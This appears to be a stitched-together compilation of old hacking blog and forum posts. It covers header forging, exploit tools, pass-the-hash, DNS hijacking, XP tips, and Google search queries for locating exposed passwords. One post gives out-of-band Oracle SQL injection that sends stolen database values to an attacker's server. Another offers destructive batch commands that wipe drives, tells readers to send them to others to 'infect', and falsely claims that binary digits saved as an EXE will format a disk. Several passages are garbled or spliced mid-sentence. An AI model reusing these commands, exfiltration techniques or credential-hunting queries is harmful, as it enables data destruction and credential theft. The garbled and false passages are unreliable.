You can go to jail warning: If you send a webserver a command that is designed to break into or crash it, you just might wind up being cellmate Spike's girlfriend. Yes, those nasty script kiddie websites offer exploits to send to webservers, and if you try them on about a thousand different websites you may eventually get unlucky and actually break in.

If you want to try out all sorts of weird commands against a webserver without breaking the law, you have permission to do it against this website, happyhacker.org and you can't get into any trouble because I own it and I set the rules, which are, basically, you can do anything you want, see if you can crash happyhacker.org or break in, it's OK with me, muhahaha!

Next, you can set up your web browser to send headers of your own design. This article by Eric Giguere is still useful for learning how to modify your browser's headers. He also has a link that displays a portion (not the entire thing) of your browser's headers. Using this link, I learn that my browser sent out this:

connection keep-alive
accept-language en-us,en;q=0.5
content-length 0
host www.ericgiguere.com
accept text/xml,application/xml,application/xhtml+xml,
text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
accept-charset ISO-8859-1,utf-8;q=0.7,*;q=0.7
keep-alive 300
cookie JSESSIONID=5CF0B8F73EB94ECA1D6AA324F2AA1ADC; __utma=13
5980773.912983502.1170270059.1170270059.1170270059.1;
__utmc=135980773;
__utmz=135980773.1170270059.1.1.utmccn=(organic)
utmcsr=googleutmctr=
change+browser+headers+Firefoxutmcmd=organic
user-agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
You can tell this doesn't show everything because it doesn't include the "GET" command.

Now let's say you would like to see absolutely everything your browser sends. You can do this by setting up a network sniffer on your own computer and use it to see everything that goes back and forth between your browser and a website. This can be especially interesting if you visit malicious websites, meaning those that try to break into your computer through your browser to install spyware and even worse Trojans that enable criminals to hide their nasty activities inside your computer. Check out http://www.winpcap.org/to learn about sniffers and for free downloads of sniffer tools.

Last on your home computer. You can direct your browser to it by typing "localhost" or "127.0.0.1" into your browser or your telnet connection.

In order to ensure that your Apache webserver saves the headers of your browser, you have to find the file named http.conf. Open it in notepad and look for the line:

CustomLog logs/agent.log agent

If there is a "#" in front of it this means Apache ignores it. If you delete the "#" then Apache will record the headers of visiting browsers, but only after you restart Abut not least, you can see what your headers look like by installing the free Apache webserverpache. Then after visiting it with your browser, you will find your headers in the agent.log file in the logs directory.

Of course after reading all this, you may wonder what the big deal is about forging headers. Or maybe you think this is super fun, in which case you must be a real hacker.

OK, so now lets go do fun stuff with the free Firefox browser. In the browser window type:

about:config

Scroll down the screen this displays to general.useragent.extra.firefox. and then double click on this line. You can change it to whatever you want. I change it from Firefox/2.0.0.1 to Lynx. Yes, most of you are too young to remember Lynx, but I'm a really, really ancient hacker and back when the Web was young we didn't have pictures and all that newfangled fancy stuff. The web was just words and links, and Lynx, which we ran from a Unix shell account (this was before Linux even!) was how we crawled the web.

Next I double click on general.useragent.locale and change en-US (meaning I want to see websites in English if they offer that option) to en-Lower Slobovia

Oh, pooh, it turns out all this does is change one of my headers to:

user-agent Mozilla/5.0 (Windows; U; Windows NT 5.1; Lower Slobovia; rv:1.8.1.1) Gecko/20061204 Lynx

This failure to totally fubar the headers tells me we can have much more fun if we use telnet or even netcat to directly connect to webservers. Then we finally can really, really fake out anyone who actually reads the logs.

You can get punched in the nose warning: Many intrusion detection and prevention systems look for really screwy browser headers. Make yours weird enough and you will make someone hopping mad -- and he or she might tell your online provider that you, yes you, sent evil headers. Yes, you can be tracked back to your home computer. If your online provider is terrified of hackers (could you actually be an evil, evil, criminal?) they might cancel your Internet service.

But lets get back to that Firefox about:config screen. Have you ever tried to enter a really weird URL you found on a hacker website into your browser and it didn't do what you expected? Your browser might be the culprit. Check out:

network.IDN.blacklist_chars

It lists all the characters your browser ignores. Many of these aren't even on your keyboard, although you can create them with a hex editor. Some of them you can't send through telnet, either. The ultimate solution to all that is netcat, a telnet-like program that is also good for lots of amazing, things. If you try really hard, netcat can enable you to do truly amazing "you can get punched in the nose" or "you can go to jail" stuff to webservers. Your choice.

Happy hacking!

MSF eXploit Builder - Free Win32 Exploit Development Platform
The MSF eXploit Builder (MSF-XB) is a free win32 application (GUI) that wants to be an Exploit Development Platform. The main goal is to speed up the exploit development process, this is accomplished by using the powerful functionalities and neat design of The Metasploit Framework.

MSF-XB automatically generates MSF compliants exploits modules.

The MSF-XB package also includes for your convenience:

Fuzzers

TAOF, The Art Of Fuzzing v0.3.2
ProxyFuzz v0.1, Rodrigo Marcos
FileFuzz v1.0.2510.28439, iDefense
FTPfuzz v1.0, Infigo
WinFuzz v1.0.0.1, Fakehalo

Handy Tools

Findjmp2, Class101
branchseeker
Faultmon
mycrc
Sysinternals (Microsoft) PStools
wget.exe, GNU
xCmd (remotexec clone)
nc.exe
A local database of opcodes/return addresses (Cross-platforms, 10 locales, fast and reverse queries)
An ASCII table
A lot of converters (Ascii, Hex, Byte, Unicode …)
Malcode Analyst Pack v0.2
Process Stalker, iDefense

REQUIREMENTS

Please edit and customize the MSF-XB.INI file
MSF-XB requires the Metasploit Framework installed to work properly (http://www.metasploit.com ): Version 3 is recommended
MSF-XB requires a debugger to be installed (Immunity Debugger)
You can download MSF eXploit Builder here:

MSF-XB.EXE (84Mb)
MD5 41e83b8cb8d60d689bff191eb7842fc1
SHA1 1cb0e457c9fa59da8f147a96afb9c1a056a4e655

scanrand - Download Stateless TCP Scanner with Syn Cookies

scanrand - Download Stateless TCP Scanner with Syn Cookies
Scanrand is extremely quick and effective port scanner. It works by forking two distinct processes:

One to send the initial queries
One to receive responses and reconcile them from the above
This makes it extremely fast.

If you haven’t heard of the suite, Scanrand is one of the five tools in Paketto Keiretsu by Dan “Effugas” Kaminsky of Doxpara Research.


Scanrand implements numerous options; reasonable defaults are selected when no specific guidance is received from the user. The only thing mandated is a target destination, which may be specified using either a FQDN(Fully Qualified Domain Name) or a numeric specification.

These numerics may employ any number of dashes, commas, or combination thereof at the same time. For example, scanrand 10.0.1-255.1-10,20:80,137-139 works fine.

More ports will be scanned by default when scanning a single host than when sca
nning a network. Scanrand is able to estimate remote hopcount by examining incoming TTLs.

Note please to install scanrand you need to first install the provided libnet, libtomcrypt and libpcap tarballs.

It’s a good alternative to nmap for certain purposes.


You can read a good article on Scanrand here:

Scanrand Dissected: A New Breed of Network Scanner

The article includes nmap vs scanrand.

You can download Scanrand here (as part of Paketto):

-1.1paketto0.tar.gz

Serious flaws in players from microsoft and aol

It looks like there is a fairly serious vulnerability in some of the popular media player packages out in the wild packaged as a MP4 file (due to the MP4 codec from 3ivx), it effects Windows Media Player 6.4 and Windows Media Player Classic, which are made by Microsoft, and AOL’s Winamp version 3.5.

All the more reason to use VLC! This follows fairly shortly after a couple of quite serious vulnerabilities in Quicktime.


Security researchers are warning that popular media players offered by Microsoft and AOL are vulnerable to attacks that can completely compromise a user’s PC.

Attack code has already been released for the bug, which has been confirmed in a codec used by older versions of Windows Media Player, made by Microsoft, and in AOL’s Winamp. A Symantec researcher has warned that users of other players may also be at risk because the vulnerability itself resides in a commonly used MP4 codec produced by a company called 3ivx Technologies.

“The exploit works by supplying victims with a maliciously formed MP4 file,” Raymond Ball wrote for Symantec’s DeepSight Threat Management System. “When a victim unknowingly clicks a link that appears safe, the MP4 content is delivered, causing the exploit to run.”

At least it’s not Microsoft’s fault this time, but they did use a dodgy codec so I guess some of the blame lays with them right?

They could have checked it out properly before bundling it into their software.


A researcher who goes by the name SYS 49152 released exploit code here, here and here that targets Windows Media Player 6.4 and Windows Media Player Classic, which are made by Microsoft, and AOL’s Winamp version 3.5. Each uses the 3ivx MP4 codec, which is vulnerable to a stack overflow.

Secunia describes the Windows Media Player vulnerabilities as “highly critical,” the second-highest rating on Secunia’s five-tier scale. The vulnerability reporting service didn’t have a rating for the Winamp vulnerability.

No patch is available. Ball recommends users remove the codec or disable media players that use the MP4 codec until the hole is plugged. That strikes us as overkill. Taking care not to click on suspicious links in browsers and email programs should suffice.

So watch out, attack vectors are getting more varied - don’t let your guard down during this merry season.

Exaggerating timing attacks results via get flooding

thinking of an actual useful application for GET request flooding this evening. Normally we only think of GET requests as a binary thing - one at a time or flooding. But what if we only launched enough GET requests with the intention of impacting server load, not bandwidth latency. So picking the right URL would be critical here (DB impacts, most likely).

When you found the right URL, launching a GET request flood against the server could seriously delay certain types of requests (especially if they must touch a database two times versus one time, for instance - if the DB was part of the flooding). Suddenly something that is normally the difference of a few microseconds could be the difference of seconds. Who cares? Because I’m always curious if there are any practical applications in hacking for DoS and this appears to be one of them - at least in theory.

Pass the hash, NTLM style

Pass the hash, NTLM style
Way back in 1997, a Windows exploit named "NT Pass the Hash" was posted on Bugtraq. This Unix-based tool was a modified SMB client that lets you use captured LanMan hashes, without having to decrypt them first.

After a mere ten years, someone has finally modernized this concept into a much more potent attack. Core Security has released Pass-The-Hash Toolkit, which runs on Windows and works with NTLM hashes. It's comprised of two key modules:

IAM.EXE - This tool "injects" another user's NTLM credentials into your current Windows logon session, given their username, Windows domain, and NTLM hash. You can then use the 'net' tools or any other Windows software that authenticates via NTLM, all under the assumed privileges of the compromised user account.
WHOSTHERE.EXE - Lists the usernames and NTLM hashes of all users logged on to a system.

No password cracking required! So if you own other systems on the network, you can just run whosthere.exe on them until you snag a domain admin's hashes. Or you could use a man-in-the middle attack, like the WPAD proxy exploit. As I discussed a few posts ago, the Metasploit guys covered several methods for grabbing NTLM hashes in their Tactical Exploitation presentation at BlackHat

Out-of-band Oracle SQL injection with HTTP Requests

Out-of-band Oracle SQL injection with HTTP Requests
I spent most of last week performing a web application assessment in the middle of nowhere, Alabama. After the mad fun at BlackHat and several weeks of unpleasant documentation work preceding it, it was a nice change to spend five peaceful days completely focused on testing an interesting system.

This was an internal application, so I wasn't surprised to find that it was vulnerable to SQL injection in several areas. However, in-band injection attacks weren't working for the application I was testing - I couldn't use UNION SELECTs, for example, to merge my query results with data rendered in the browser. So I had to leverage an out-of-band technique for retrieving data through SQL injection: Oracle's UTL_HTTP.REQUEST function. David Litchfield mentioned this approach almost two years ago in Data-mining with SQL Injection and Inference, but I never had the need to use it "in the wild" until now.


UTL_HTTP is a built-in Oracle SQL function that issues HTTP requests. The syntax is pretty simple:

URL_HTTP.REQUEST('http://www.foo.com/index.php')
returns the first 2000 bytes from the provided URL. But the clever bit is that you can concatenate the URL with another SQL statement, the results of which will become part of the request.

For example, consider the following SQL:

UTL_HTTP.REQUEST('http://www.foo.com:80/'||(SELECT USERNAME FROM DBA_USERS WHERE ROWNUM=1))

The SELECT statement returns the value "SYS" - the first user in the DBA_USERS table. The HTTP request issued by the database is therefore for the URL "http://www.foo.com:80/SYS". In www.foo.com's HTTP access log, the request would look like:

158.72.4.21 - - [08/Aug/2007:10:02:40 +0000] "GET /SYS HTTP/1.1" 404 0 - -
(assuming 158.72.4.21 is our target DB server)


So as an attacker, you simply need to run a web server and point the UTL_HTTP.REQUESTs to your own IP address. You can then view the result of each SQL injection in your server logs. If in Windows, I like to use SHTTPD as it is lightweight and simple to turn on and off.


The biggest limitation to this approach is that you can only query for one row at a time - you'll get an error message if your statement returns multiple rows. (That is due to the UTL_HTTP.RQUEST function itself, not the web server end). But it is still a lot more efficient then using blind SQL injection to brute force one character of a response at a time. Oracle will also throw an error if it can't reach your web server, which may be the case depending on network controls between yourself and the database. Experiment with running on different ports.


There are probably a few things you could do to make the attack more elegant, like setting up a CGI script on your server to better collect and parse the calls from the database. You could also create and inject a PL/SQL function that concatenates results from multiple rows to get around the single-row limitation. I needed a quick and dirty solution to get a few key database records, so I didn't bother venturing beyond the basics for this test.


Outbound HTTP requests originating from a database server should look suspicious, but I think the attack is obscure enough to slip by most admins.

Hijacking dns

Restricting access to specific Internet web services is a challenge shared by all network administrators. Whether the reason for restricting access is based on security, bandwidth, or productivity, installing and maintaining proxy and content filter applications may be outside the budget of a small IT department.

The solution provided here offers a cumbersome approach for a small investment: $0.

All web services, such as HTTP, FTP, IRC, IM, NNTP and SMTP are predominantly called by name when end users want to access them. An internal DNS server usually hosts records for only the internal namespace. All external (Internet) namespace is generally forwarded to an ISP’s or other DNS server.

DNS hijacking on the LAN allows an administrator to redirect all Internet requests for a domain or server to an internal server or to nowhere (127.0.0.1).

HIJACKING GOOGLE

If an administrator wanted to hijack and redirect all users’ connections to google.com, he’d only need to add a Primary Lookup Zone for the domain name.

The steps for Server 2003 are as follows:

- Open the DNS console
- Expand your server
- Right-click Forward Lookup Zones and select New Zone.
- Click Next on the Wizard welcome page.
- Create a Primary Forward Lookup Zone. Do NOT integrate the zone with Active Directory if the option appears.
- Type the name of the zone: google.com
- Accept the default file name for the zone and click Next.
- Click Next.
- Click Finish.

Your DNS server is now authoritative for google.com. Instead of forwarding your clients’ DNS queries to the ISP DNS server, the server returns any records it holds in its own database. If the requested record does not exist, the DNS server tells the client that the name does not exist.

CREATE RECORDS

Create host records for the default namespace (i.e. google.com) and any hosts that you want to redirect (e.g. www.google.com). If you simply want the connections to die, saving any Internet bandwidth that would have otherwise been used, set the IP Address for each host record to 127.0.0.1. This will cause a client machine to attempt to connect to itself instead of the requested server. In most cases, this simply returns an error to the application that requested the Internet Server

Mail can be redirected by creating an MX record in the Zone you’ve chosen to hijack.

GETTING FANCY – REDIRECTION TO A BANNED ACCESS PAGE

An administrator can redirect all web requests to hijacked servers to an internal web page that reiterates the network policy. For example, when a user browses to www.google.com, he instead reaches a web page that proclaims, “You attempted to access an inappropriate web page. This action has been logged.”

If you want to get really sophisticated, you can use ASP.NET to build a neat page that reads the HTTP request and user token to personalize the page. If you are a masochist, you can tie it to a SQL database and log all transgressions.

CREATING THE BANNED ACCESS PAGE

- Install the Windows Web Service (Add/Remove Programs>Add/Remove Windows Components>Application Server)
- In C:\inetpub\wwwroot drop a web page saying nasty stuff to your end users. Name it default.html.
- Use this server’s IP address instead of 127.0.01 for all records you’d like to hijack.

BAD SOLUTION – GOOD PRICE

This solution is not scalable, dynamic or easy to maintain. But it is free. And it works.

WORKAROUNDS

If the client knows the IP Address of the remote server, he can still connect directly by IP Address.

If the client changes his DNS Server to an Internet DNS server, it bypasses the entries for the hijacked domains. However, if the client is on an Active Directory domain, he will lose access to the domain controllers and Active Directory.

Clients can use a web proxy to view desired web content. External web proxies do not rely on the internal DNS server for name resolution.

Clone A HDD witout buying any software

Sunday, December 9, 2007

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.


Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:

"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.

Format a hdd with notepad

Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000



format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000



del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001


try to figure out urself rest
cant spoonfeed
its workin


Do not try it on ur PC. dont mess around this is for educational purpose only

still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*y

save it as Dell.bat


worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

20 things you didn't knew about xp

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. The next release of Windows XP, codenamed Longhorn, is due out late dis month The next big release is codenamed Blackcomb and will be out in 2010/2011

HAcking google for finding passwords and other personal info

Introduction
This is not about finding sensitive data during an assessment as much as
it is about what the “bad guys” might do to troll for the data.The examples presented
generally represent the lowest-hanging fruit on the security
tree. Hackers target this information on a daily basis.To protect against this type
of attacker, we need to be fairly candid about the worst-case possibilities.We
won’t be overly candid, however.
We start by looking at some queries that can be used to uncover usernames,
the less important half of most authentication systems.The value of a username is
often overlooked, but, an entire multimilliondollar
security system can be shattered through skillful crafting of even the
smallest, most innocuous bit of information.
Next, we take a look at queries that are designed to uncover passwords. Some
of the queries we look at reveal encrypted or encoded passwords, which will take
a bit of work on the part of an attacker to use to his or her advantage.We also
take a look at queries that can uncover cleartext passwords.These queries are some
of the most dangerous in the hands of even the most novice attacker. What could
make an attack easier than handing a username and cleartext password to an
attacker?
We wrap up by discussing the very real possibility of uncovering
highly sensitive data such as credit card information and information used to
commit identity theft, such as Social Security numbers. Our goal here is to
explore ways of protecting against this very real threat.To that end, we don’t go
into details about uncovering financial information and the like. If you’re a “dark
side” hacker, you’ll need to figure these things out on your own.
Searching for Usernames
Most authentication mechanisms use a username and password to protect information.
To get through the “front door” of this type of protection, you’ll need to
determine usernames as well as passwords. Usernames also can be used for social
engineering efforts, as we discussed earlier.
Many methods can be used to determine usernames. In Chapter 10, we
explored ways of gathering usernames via database error messages. In Chapter 8
we explored Web server and application error messages that can reveal various
information, including usernames.These indirect methods of locating usernames
are helpful, but an attacker could target a usernames directory
query like “your username is”. This phrase can locate help pages that describe the
username creation process,
information gleaned from other sources, such as Google Groups posts or phone
listings.The usernames could then be recycled into various other phases of the
attack, such as a worm-based spam campaign or a social-engineering attempt.An
attacker can gather usernames from a variety of sources, as shown in the sample
queries listed
Sample Queries That Locate Usernames
Query Description
inurl:admin inurl:userlist Generic userlist files
inurl:admin filetype:asp Generic userlist files
inurl:userlist
inurl:php inurl:hlstats intext: Half-life statistics file, lists username and
Server Username other information
filetype:ctl inurl:haccess. Microsoft FrontPage equivalent of htaccess
ctl Basic shows Web user credentials
Query Description
filetype:reg reg intext: Microsoft Internet Account Manager can
”internet account manager” reveal usernames and more
filetype:wab wab Microsoft Outlook Express Mail address
books
filetype:mdb inurl:profiles Microsoft Access databases containing (user)
profiles.
index.of perform.ini mIRC IRC ini file can list IRC usernames and
other information
inurl:root.asp?acs=anon Outlook Mail Web Access directory can be
used to discover usernames
filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals
conf –sample username and server information
filetype:log username putty PUTTY SSH client logs can reveal usernames
and server information
filetype:rdp rdp Remote Desktop Connection files reveal user
credentials
intitle:index.of .bash_history UNIX bash shell history reveals commands
typed at a bash command prompt; usernames
are often typed as argument strings
intitle:index.of .sh_history UNIX shell history reveals commands typed at
a shell command prompt; usernames are
often typed as argument strings
“index of ” lck Various lock files list the user currently using
a file
+intext:webalizer +intext: Webalizer Web statistics page lists Web user-
Total Usernames +intext: names and statistical information
”Usage Statistics for”
filetype:reg reg HKEY_ Windows Registry exports can reveal
CURRENT_USER username usernames and other information

Underground Googling
Searching for a Known Filename
Remember that there are several ways to search for a known filename.
One way relies on locating the file in a directory listing, like intitle:index.of
install.log. Another, often better, method relies on the filetype operator,
as in filetype:log inurl:install.log. Directory listings are not all that
common. Google will crawl a link to a file in a directory listing, meaning
that the filetype method will find both directory listing entries as well as
files crawled in other ways.

In some cases, usernames can be gathered from Web-based statistical programs
that check Web activity.The Webalizer program shows all sorts of information
about a Web server’s usage. Output files for the Webalizer program can be
located with a query such as intext:webalizer intext:”Total Usernames” intext:”Usage
Statistics for”. Among the information displayed is the username that was used to
connect to the Web server, as shown in Figure 9.2. In some cases, however, the
usernames displayed are not valid or current, but the “Visits” column lists the
number of times a user account was used during the capture period.This enables
an attacker to easily determine which accounts are more likely to be valid.


The Windows registry holds all sorts of authentication information, including
usernames and passwords.Though it is unlikely (and fairly uncommon) to locate
live, exported Windows registry files on the Web, at the time of this writing
there are nearly 100 hits on the query filetype:reg HKEY_CURRENT_USER
username, which locates Windows registry files that contain the word username
and in some cases passwords,



As any talented attacker or security person will tell you, it’s rare to get information
served to you on a silver platter. Most decent finds take a bit of persistence,
creativity, intelligence, and just a bit of good luck. For example, consider
the Microsoft Outlook Web Access portal, which can be located with a query
like inurl:root.asp?acs=anon. At the time of this writing, fewer than 50 sites are
returned by this query, even though there a certainly more than 50 sites running
the Microsoft Web-based mail portal. Regardless of how you might locate a site
running this e-mail gateway, it’s not uncommon for the site to host a public
directory (denoted “Find Names,” by default)


The public directory allows access to a search page that can be used to find
users by name. In most cases, wildcard searching is not allowed, meaning that a
search for * will not return a list of all users, as might be expected. Entering a
search for a space is an interesting idea, since most user descriptions contain a
space, but most large directories will return the error message “This query would
return too many addresses!” Applying a bit of creativity, an attacker could begin
searching for individual common letters, such as the “Wheel of Fortune letters”
R, S,T, L, N, and E. Eventually one of these searches will most likely reveal a list
of user information like


Once a list of user information is returned, the attacker can then recycle the
search with words contained in the user list, searching for the words Voyager,
Freshmen, or Campus, for example.Those results can then be recycled, eventually
resulting in a nearly complete list of user information.
Searching for Passwords
Password data, one of the “Holy Grails” during a penetration test, should be protected.
Unfortunately, many examples of Google queries can be used to locate
passwords on the Web, as shown in Table 9.2.
Table 9.2 Queries That Locate Password Information
Query Description
inurl:/db/main.mdb ASP-Nuke passwords
filetype:cfm “cfapplication ColdFusion source with potential passwords
name” password
filetype:pass pass intext:userid dbman credentials
allinurl:auth_user_file.txt DCForum user passwords
eggdrop filetype:user user Eggdrop IRC user credentials
filetype:ini inurl:flashFXP.ini FlashFXP FTP credentials
filetype:url +inurl:”ftp://” FTP bookmarks cleartext passwords
+inurl:”@”
inurl:zebra.conf intext: GNU Zebra passwords
password -sample -test
-tutorial –download
filetype:htpasswd htpasswd HTTP htpasswd Web user credentials
intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
htpasswd.bak
“http://*:*@www” bob:bob HTTP passwords (bob is a sample username)
“sets mode: +k” IRC channel keys (passwords)
“Your password is * Remember IRC NickServ registration passwords
this for later use”
signin filetype:url JavaScript authentication credentials

Queries That Locate Password Information
Query Description
LeapFTP intitle:”index.of./” LeapFTP client login credentials
sites.ini modified
inurl:lilo.conf filetype:conf LILO passwords
password -tatercounter2000
-bootpwd –man
filetype:config config intext: Microsoft .NET application credentials
appSettings “User ID”
filetype:pwd service Microsoft FrontPage Service Web passwords
intitle:index.of Microsoft FrontPage Web credentials
administrators.pwd
“# -FrontPage-” inurl:service.pwd Microsoft FrontPage Web passwords
ext:pwd inurl:_vti_pvt inurl: Microsoft FrontPage Web passwords
(Service authors administrators)
inurl:perform filetype:ini mIRC nickserv credentials
intitle:”index of” intext: mySQL database credentials
connect.inc
intitle:”index of” intext: mySQL database credentials
globals.inc
filetype:conf oekakibbs Oekakibss user passwords
filetype:dat wand.dat Opera‚ ÄúMagic Wand‚Äù Web credentials
inurl:ospfd.conf intext: OSPF Daemon Passwords
password -sample -test
-tutorial –download
index.of passlist Passlist user credentials
inurl:passlist.txt passlist.txt file user credentials
filetype:dat “password.dat” password.dat files
inurl:password.log filetype:log password.log file reveals usernames, passwords,
and hostnames
filetype:log inurl:”password.log” password.log files cleartext passwords
inurl:people.lst filetype:lst People.lst generic password file
intitle:index.of config.php PHP Configuration File database credentials
inurl:config.php dbuname dbpass PHP Configuration File database credentials
inurl:nuke filetype:sql PHP-Nuke credentials
Queries That Locate Password Information
Query Description
filetype:conf inurl:psybnc.conf psyBNC IRC user credentials
“USER.PASS=”
filetype:ini ServUDaemon servU FTP Daemon credentials
filetype:conf slapd.conf slapd configuration files root password
inurl:”slapd.conf” intext: slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
inurl:”slapd.conf” intext: slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
filetype:sql “IDENTIFIED BY” –cvs SQL passwords
filetype:sql password SQL passwords
filetype:ini wcx_ftp Total Commander FTP passwords
filetype:netrc password UNIX .netrc user credentials
index.of.etc UNIX /etc directories contain various credential
files
intitle:”Index of..etc” passwd UNIX /etc/passwd user credentials
intitle:index.of passwd UNIX /etc/passwd user credentials
passwd.bak
